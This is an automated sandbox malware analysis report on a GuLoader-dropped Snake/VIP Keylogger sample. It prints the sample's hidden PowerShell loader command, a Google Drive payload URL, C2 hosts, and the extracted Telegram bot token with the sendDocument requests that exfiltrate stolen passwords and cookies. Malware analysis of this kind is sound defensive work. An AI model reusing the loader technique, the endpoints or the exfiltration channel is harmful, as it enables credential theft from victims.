
Windows Analysis Report
fGu8xWoMrg.exe

Overview

General Information

Sample name: fGu8xWoMrg.exe (renamed because original name is a hash value)
Original sample name: 2bbb66a5bad18e8ca2fee4fec0bfc6ce83b1cc4852d712c986685f095b3589ce.exe
Analysis ID: 1587907
MD5: 487fad16da392c87fb894a6ccbd95870
SHA1: 16f4935ce6d245d535f23a1557b6f0e0ad77baa9
SHA256: 2bbb66a5bad18e8ca2fee4fec0bfc6ce83b1cc4852d712c986685f095b3589ce
Tags: exe, GuLoader, signed, user-adrian__luca

Detection

GuLoader, Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • fGu8xWoMrg.exe (PID: 2504 cmdline: "C:\Users\user\Desktop\fGu8xWoMrg.exe" MD5: 487FAD16DA392C87FB894A6CCBD95870)
    • powershell.exe (PID: 1864 cmdline: powershell.exe -windowstyle hidden "$Subleasing20=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Afsyringer.Una';$Damselflies181=$Subleasing20.SubString(62296,3);.$Damselflies181($Subleasing20) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Mangedoblende.exe (PID: 1292 cmdline: "C:\Users\user\AppData\Local\Temp\Mangedoblende.exe" MD5: 487FAD16DA392C87FB894A6CCBD95870)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendMessage"}
{"Exfil Mode": "Telegram", "Token": "7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE", "Chat_id": "7695061973", "Version": "4.4"}
Source | Rule | Description | Author
00000006.00000002.3346863955.000000001F3A1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
00000006.00000002.3346863955.000000001F4A8000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000006.00000002.3346863955.000000001F4A8000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
00000006.00000002.3346863955.000000001F4A8000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000002.00000002.2521881649.0000000009B31000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security

            System Summary

Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Data: Command: powershell.exe -windowstyle hidden "$Subleasing20=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Afsyringer.Una';$Damselflies181=$Subleasing20.SubString(62296,3);.$Damselflies181($Subleasing20) ", CommandLine: powershell.exe -windowstyle hidden "$Subleasing20=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Afsyringer.Una';$Damselflies181=$Subleasing20.SubString(62296,3);.$Damselflies181($Subleasing20) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\fGu8xWoMrg.exe", ParentImage: C:\Users\user\Desktop\fGu8xWoMrg.exe, ParentProcessId: 2504, ParentProcessName: fGu8xWoMrg.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Subleasing20=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Afsyringer.Una';$Damselflies181=$Subleasing20.SubString(62296,3);.$Damselflies181($Subleasing20) ", ProcessId: 1864, ProcessName: powershell.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell.exe -windowstyle hidden "$Subleasing20=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Afsyringer.Una';$Damselflies181=$Subleasing20.SubString(62296,3);.$Damselflies181($Subleasing20) ", CommandLine: powershell.exe -windowstyle hidden "$Subleasing20=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Afsyringer.Una';$Damselflies181=$Subleasing20.SubString(62296,3);.$Damselflies181($Subleasing20) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\fGu8xWoMrg.exe", ParentImage: C:\Users\user\Desktop\fGu8xWoMrg.exe, ParentProcessId: 2504, ParentProcessName: fGu8xWoMrg.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Subleasing20=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Afsyringer.Una';$Damselflies181=$Subleasing20.SubString(62296,3);.$Damselflies181($Subleasing20) ", ProcessId: 1864, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T19:17:33.182363+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49955 | 104.21.96.1 | 443 | TCP
2025-01-10T19:17:35.149863+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49969 | 104.21.96.1 | 443 | TCP
2025-01-10T19:17:30.902465+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49937 | 132.226.247.73 | 80 | TCP
2025-01-10T19:17:32.355634+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49937 | 132.226.247.73 | 80 | TCP
2025-01-10T19:17:34.605637+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49960 | 193.122.6.168 | 80 | TCP
2025-01-10T19:17:25.955766+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49905 | 142.250.185.174 | 443 | TCP
2025-01-10T19:17:53.897388+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49998 | 149.154.167.220 | 443 | TCP
2025-01-10T19:17:56.507059+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 50000 | 149.154.167.220 | 443 | TCP
2025-01-10T19:17:47.167816+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49997 | 149.154.167.220 | 443 | TCP


            AV Detection

Source: 00000006.00000002.3346863955.000000001F3A1000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE", "Chat_id": "7695061973", "Version": "4.4"}
Source: Mangedoblende.exe.1292.6.memstrmin; Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendMessage"}
Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe; ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe; Virustotal: Detection: 75%
Source: fGu8xWoMrg.exe; Virustotal: Detection: 75%
Source: fGu8xWoMrg.exe; ReversingLabs: Detection: 63%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.8% probability

            Location Tracking

Source: unknown; DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe; Code function: 6_2_227A87C0 CryptUnprotectData, 6_2_227A87C0
Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe; Code function: 6_2_227A8EF1 CryptUnprotectData, 6_2_227A8EF1
Source: fGu8xWoMrg.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown; HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49947 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 142.250.185.174:443 -> 192.168.2.5:49905 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 216.58.212.161:443 -> 192.168.2.5:49916 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49997 version: TLS 1.2
Source: fGu8xWoMrg.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: stem.Core.pdb source: powershell.exe, 00000002.00000002.2502967073.00000000072FA000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\fGu8xWoMrg.exe; Code function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405C13
Source: C:\Users\user\Desktop\fGu8xWoMrg.exe; Code function: 0_2_0040683D FindFirstFileW,FindClose, 0_2_0040683D
Source: C:\Users\user\Desktop\fGu8xWoMrg.exe; Code function: 0_2_0040290B FindFirstFileW, 0_2_0040290B
Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe; Code function: 6_2_0040290B FindFirstFileW, 6_2_0040290B
Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe; Code function: 6_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 6_2_00405C13
Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe; Code function: 6_2_0040683D FindFirstFileW,FindClose, 6_2_0040683D
Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe; Code function: 4x nop then jmp 0018F45Dh 6_2_0018F2C4

            Networking

Source: Network traffic; Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49998 -> 149.154.167.220:443
Source: Network traffic; Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50000 -> 149.154.167.220:443
Source: Network traffic; Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49997 -> 149.154.167.220:443
Source: unknown; DNS query: name: api.telegram.org
Source: global traffic; HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:980108%0D%0ADate%20and%20Time:%2011/01/2025%20/%2007:46:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20980108%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendDocument?chat_id=7695061973&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3278838ce892Host: api.telegram.orgContent-Length: 582
            Source: global trafficHTTP traffic detected: POST /bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendDocument?chat_id=7695061973&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3298cde51afdHost: api.telegram.orgContent-Length: 1279
            Source: Joe Sandbox View | IP Address: 149.154.167.220
            Source: Joe Sandbox View | IP Address: 104.21.96.1
            Source: Joe Sandbox View | IP Address: 193.122.6.168
            Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknown | DNS query: name: checkip.dyndns.org
            Source: unknown | DNS query: name: reallyfreegeoip.org
            Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49937 -> 132.226.247.73:80
            Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49960 -> 193.122.6.168:80
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49905 -> 142.250.185.174:443
            Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49955 -> 104.21.96.1:443
            Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49969 -> 104.21.96.1:443
            Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1aVyHkb4ziObNW2GCtVueavZAlvEYJlzq HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0; Host: drive.google.com; Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: GET /download?id=1aVyHkb4ziObNW2GCtVueavZAlvEYJlzq&export=download HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0; Cache-Control: no-cache; Host: drive.usercontent.google.com; Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET / HTTP/1.1; User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;); Host: checkip.dyndns.org; Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET / HTTP/1.1; User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;); Host: checkip.dyndns.org
            Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49947 version: TLS 1.0
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global traffic | DNS traffic detected: DNS query: drive.google.com
            Source: global traffic | DNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
            Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
            Source: unknown | HTTP traffic detected: POST /bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendDocument?chat_id=7695061973&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1; Content-Type: multipart/form-data; boundary=------------------------8dd3278838ce892; Host: api.telegram.org; Content-Length: 582
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.18.0; Date: Fri, 10 Jan 2025 18:17:47 GMT; Content-Type: application/json; Content-Length: 55; Connection: close; Strict-Transport-Security: max-age=31536000; includeSubDomains; preload; Access-Control-Allow-Origin: *; Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F4A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F3A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F3A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F540000.00000004.00000800.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000002.3346863955.000000001F4A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F3A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F3A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
            Source: fGu8xWoMrg.exe, Mangedoblende.exe.2.dr | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000002.00000002.2499631816.0000000005D46000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000002.00000002.2494742729.0000000004E36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000002.00000002.2494742729.0000000004E36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: powershell.exe, 00000002.00000002.2494742729.0000000004CE1000.00000004.00000800.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000002.3346863955.000000001F3A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000002.00000002.2494742729.0000000004E36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F3A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
            Source: powershell.exe, 00000002.00000002.2494742729.0000000004E36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000002.00000002.2519984504.000000000852C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.00000000203C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: powershell.exe, 00000002.00000002.2494742729.0000000004CE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lBeq
            Source: powershell.exe, 00000002.00000002.2494742729.0000000004E36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F540000.00000004.00000800.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000002.3346863955.000000001F4A8000.00000004.00000800.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000002.3346863955.000000001F484000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F4A8000.00000004.00000800.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000002.3346863955.000000001F484000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F484000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F484000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:980108%0D%0ADate%20a
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F4A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendDocument?chat_id=7695
            Source: Mangedoblende.exe, 00000006.00000003.2566562285.0000000003526000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apis.google.com
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.00000000203C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.00000000203C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.00000000203C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F561000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F55C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlBeq
            Source: powershell.exe, 00000002.00000002.2499631816.0000000005D46000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000002.00000002.2499631816.0000000005D46000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000002.00000002.2499631816.0000000005D46000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
            Source: Mangedoblende.exe, 00000006.00000002.3334889586.00000000034B8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/&)
            Source: Mangedoblende.exe, 00000006.00000002.3334889586.00000000034B8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/n)D20
            Source: Mangedoblende.exe, 00000006.00000002.3334889586.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000002.3335288080.0000000003770000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1aVyHkb4ziObNW2GCtVueavZAlvEYJlzq
            Source: Mangedoblende.exe, 00000006.00000002.3334889586.00000000034F3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1aVyHkb4ziObNW2GCtVueavZAlvEYJlzqT
            Source: Mangedoblende.exe, 00000006.00000002.3334889586.000000000351E000.00000004.00000020.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000003.2604018957.0000000003519000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/
            Source: Mangedoblende.exe, 00000006.00000002.3334889586.000000000351E000.00000004.00000020.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000003.2566562285.0000000003526000.00000004.00000020.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000002.3334889586.000000000350D000.00000004.00000020.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000003.2604018957.0000000003519000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1aVyHkb4ziObNW2GCtVueavZAlvEYJlzq&export=download
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.00000000203C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.00000000203C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.00000000203C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: powershell.exe, 00000002.00000002.2494742729.0000000004E36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000002.00000002.2499631816.0000000005D46000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F45C000.00000004.00000800.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000002.3346863955.000000001F484000.00000004.00000800.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000002.3346863955.000000001F3ED000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F3ED000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F3ED000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F417000.00000004.00000800.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000002.3346863955.000000001F45C000.00000004.00000800.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000002.3346863955.000000001F484000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
            Source: Mangedoblende.exe, 00000006.00000003.2566562285.0000000003526000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ssl.gstatic.com
            Source: Mangedoblende.exe, 00000006.00000003.2566562285.0000000003519000.00000004.00000020.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000003.2566562285.0000000003526000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: Mangedoblende.exe, 00000006.00000003.2566562285.0000000003519000.00000004.00000020.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000003.2566562285.0000000003526000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.00000000203C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
            Source: Mangedoblende.exe, 00000006.00000003.2566562285.0000000003519000.00000004.00000020.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000003.2566562285.0000000003526000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: Mangedoblende.exe, 00000006.00000003.2566562285.0000000003519000.00000004.00000020.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000003.2566562285.0000000003526000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com;report-uri
            Source: Mangedoblende.exe, 00000006.00000003.2566562285.0000000003526000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
